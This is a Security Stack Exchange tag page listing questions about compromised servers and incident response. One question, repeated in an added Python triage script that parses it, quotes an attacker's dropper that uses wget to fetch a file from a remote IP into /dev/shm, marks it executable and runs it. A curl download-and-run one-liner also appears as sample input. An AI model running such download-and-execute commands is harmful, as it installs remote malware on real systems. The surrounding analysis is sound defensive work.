Questions tagged [system-compromise]

Dealing with a system compromise: your defenses failed, now what?

First, read How do I deal with a compromised server?

Common issues

146 questions
186 votes, 6 answers

How do I deal with a compromised server?

I suspect that one or more of my servers is compromised by a hacker, virus, or other mechanism: What are my first steps? When I arrive on site should I disconnect the server, preserve "evidence", are there other initial considerations? How do I go…
Lucas Kauffman
171 votes, 10 answers

Should I be concerned if the "FBI" has logged onto my Ubuntu VPS?

Yesterday, I was performing a bit of general maintenance on a VPS of mine, using the IPMI console my host provided. Upon setting up SSH keys again via the IPMI console, I logged in via SSH and was shocked to see this: Welcome to Ubuntu 14.04.2 LTS…
lol what is this
166 votes, 10 answers

How do you explain the necessity of "nuke it from orbit" to management and users?

When a machine has been infected with malware, most of us here immediately identify the appropriate action as "nuke it from orbit" - i.e. wipe the system and start over. Unfortunately, this is often costly for a company, especially if backups are…
Polynomial
73 votes, 8 answers

How can Twitter and GitHub be sure that they haven't been hacked?

Yesterday, Twitter announced that they recently identified a bug that stored passwords unmasked in an internal log. Recently, GitHub also had a similar bug. In both cases, they claim that nobody had access to these files. Twitter: We have fixed the…
Kepotx
69 votes, 7 answers

Is it possible the person sitting across from me at Starbucks was trying to hack my laptop?

I was using my laptop at a Starbucks on a table, and a person was using a laptop on the same table across from me, a couple seats to my side. He flicked some plastic thing across the table towards my laptop. What really freaked me out was he then…
Murvin
28 votes, 4 answers

A tiny version of wget (51 bytes?)

On this ISC article on DVR compromise the author talks about the compromise of an embedded system. In particular, the attacker executes a series of echo commands on the remote host, and: This DVR has no "upload" feature. There is no wget nor is…
lorenzog
28 votes, 12 answers

Is there a secure way to transfer data outside the Internet?

Since it has recently been proven that transferring data through the USB port is fundamentally flawed, I'm wondering if there are 100% secure ways to transfer data without using the Internet. Suppose Alan has a computer system that has been…
24 votes, 7 answers

A government agency sent our website admin an email that our website had been defaced

We got an official email saying that our website had been hacked. They cited the URL to use to see the new suspicious file that had been dropped in our web root folder (s.htm). Just some text about a "Morrocan Made hacker - I'm Back" in the HTML…
Grantly
16 votes, 5 answers

KeePass security local malware

Can malware that has infected your local computer compromise a KeePass database stored locally in any way? If yes, what's the point of KeePass having such strong security mechanisms if it cannot resist this scenario? If you keep your DB locally,…
KB303
15 votes, 1 answer

Should a server be considered compromised simply because a port was open?

Earlier today I received a notification of a security incident at Mandrill. At first I was concerned, but then after I dove into the details I became confused as to why they considered this noteworthy at all. To summarize, it appears that Mandrill…
Michael Hampton
13 votes, 3 answers

What does this sh script do if executed?

I have intercepted an attack on my web server that I believe was unsuccessful. The attacker tried to execute this script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/shm ; wget…
Patrick Bassut
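One way to answer "what does this script do" without running it, as an added example that is not part of the original question or its answers: parse the dropper statically and pull out the download URL, the file it is written to, what gets `chmod +x`, and what is then executed. The sample input below is the visible fragment of the script quoted in the question (the host 221.132.37.26 and the `...x` file name come from the excerpt), reconstructed one command per line; the portion the excerpt truncates is not reproduced. The `wget`/`curl` handling generalizes a little beyond the quoted script (it also understands `&&`-chained commands and `curl -o`), which the second usage call shows.

```python
import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample: the visible part of the script quoted in the question,
# split into one command per line. The part the excerpt truncates ("wget…")
# is not reproduced. Nothing in this file executes the script; it is text only.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/xx -O ...x
chmod +x ...x
./...x
cd /dev/shm
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Symbolic (+x, u=rwx) or octal (755) chmod modes; any other argument is a path.
CHMOD_MODE_RE = re.compile(r"[ugoa]*[+\-=][rwxXst]*|[0-7]{3,4}")
# wget -O / --output-document and curl -o / --output name the file written.
OUTPUT_FLAGS = ("-O", "-o", "--output-document", "--output")


@dataclass
class Triage:
    work_dirs: list = field(default_factory=list)        # cd targets, in order
    downloads: list = field(default_factory=list)        # (url, output path or None)
    made_executable: list = field(default_factory=list)  # chmod targets
    executed: list = field(default_factory=list)         # ./x or /path/x invocations
    iocs: set = field(default_factory=set)               # hosts contacted


def split_commands(script: str):
    """Yield simple commands: split lines on ';', '&&', '||'; skip shebang/comments."""
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for cmd in re.split(r";|&&|\|\|", line):
            cmd = cmd.strip()
            if cmd:
                yield cmd


def triage(script: str) -> Triage:
    """Statically extract the download / chmod / execute chain from a dropper."""
    t = Triage()
    for cmd in split_commands(script):
        try:
            argv = shlex.split(cmd)
        except ValueError:  # unbalanced quotes: fall back to a whitespace split
            argv = cmd.split()
        if not argv:
            continue
        prog, args = argv[0], argv[1:]
        if prog == "cd" and args:
            t.work_dirs.append(args[0])
        elif prog in ("wget", "curl"):
            out = None
            for flag in OUTPUT_FLAGS:
                if flag in args and args.index(flag) + 1 < len(args):
                    out = args[args.index(flag) + 1]
            for url in (a for a in args if URL_RE.fullmatch(a)):
                t.downloads.append((url, out))
                host = urlparse(url).hostname
                if host:
                    t.iocs.add(host)
        elif prog == "chmod":
            t.made_executable.extend(
                a for a in args
                if not a.startswith("-") and not CHMOD_MODE_RE.fullmatch(a)
            )
        elif prog.startswith(("./", "/")):
            t.executed.append(prog)
    return t


def is_download_and_execute(t: Triage) -> bool:
    """True if a file that was downloaded is later executed: the dropper pattern."""
    fetched = {out for _, out in t.downloads if out}
    run = {p[2:] if p.startswith("./") else p for p in t.executed}
    return bool(fetched & run)


if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print("download-and-execute:", is_download_and_execute(result))
    print("IOCs to block/hunt for:", sorted(result.iocs))
    print("downloads:", result.downloads)
    # Same chain written as a curl one-liner (constructed input).
    other = triage("curl -s http://example.invalid/a -o /tmp/b && /tmp/b")
    print("curl variant is download-and-execute:", is_download_and_execute(other))
```

The output of `triage` is what you actually want from such an intercepted script: the host to block and search for in proxy and flow logs, the paths (here `/dev/shm`) to check on every host that received the same request, and a yes/no on whether the script is a download-and-execute dropper. If it is, the next step is the one the first question on this page describes: treat the box as compromised until proven otherwise, not "the attack looked unsuccessful".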
13 votes, 3 answers

Would encrypting a database protect against a compromised admin account?

I was discussing with someone ways to prevent data disclosure from a compromised admin account on a database server. The other person proposed encrypting the data at rest within the database. It sounds like a good idea, but I wasn't sure if that…
Kevin Mirsky
11 votes, 1 answer

How do I deal with a compromised network device?

I suspect that a network device (modem, router, switch, access point, etc.) is compromised. What should I do?
André Borie
10 votes, 3 answers

Yahoo Security Breach Affecting 500,000,000+ Accounts: Why would they believe it was "state-sponsored"?

It was recently disclosed that private information pertaining to over 500 million Yahoo accounts was stolen. Yahoo's Chief Information Security Officer, Bob Lord, states that the information was stolen from Yahoo's computers by what Yahoo "believes…
10 votes, 2 answers

How did hackers compromise my EC2 instance?

My EC2 instance was hacked recently. It doesn't really matter as I'm just starting my website and there was no sensitive information on my server yet, but I do plan for there to be in the future. I am going to terminate the compromised server and…
Dennis